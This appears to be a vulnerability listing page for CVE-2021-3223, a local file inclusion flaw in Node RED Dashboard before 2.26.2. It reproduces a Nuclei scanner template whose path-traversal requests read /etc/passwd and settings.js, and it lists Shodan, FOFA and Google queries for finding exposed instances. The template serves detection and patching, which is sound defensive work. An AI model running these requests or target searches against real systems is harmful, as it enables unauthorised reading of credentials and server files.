CVE-2021-3223: Node RED Dashboard <2.26.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Node RED Dashboard | POC: 已公开

漏洞描述

NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.

PoC代码[已公开]

id: CVE-2021-3223

info:
  name: Node RED Dashboard <2.26.2 - Local File Inclusion
  author: gy741,pikpikcu
  severity: high
  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.
  reference:
    - https://github.com/node-red/node-red-dashboard/issues/669
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3223
    cwe-id: CWE-22
    epss-score: 0.88649
    epss-percentile: 0.99485
    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nodered
    product: node-red-dashboard
    framework: node.js
    shodan-query:
      - title:"Node-RED"
      - http.title:"node-red"
    fofa-query:
      - title="Node-RED"
      - title="node-red"
    google-query: intitle:"node-red"
  tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js

http:
  - method: GET
    path:
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED web server is listening"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100c46eabfbe1c171862c67ebb4745d25356ab2d8fa636c39120afaa3389fe06fc90221008213b736dd4a8db5cb7b1a696e079e0e6ac9c9c06eed1dd9c68c7bd7d204c697:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3223.yaml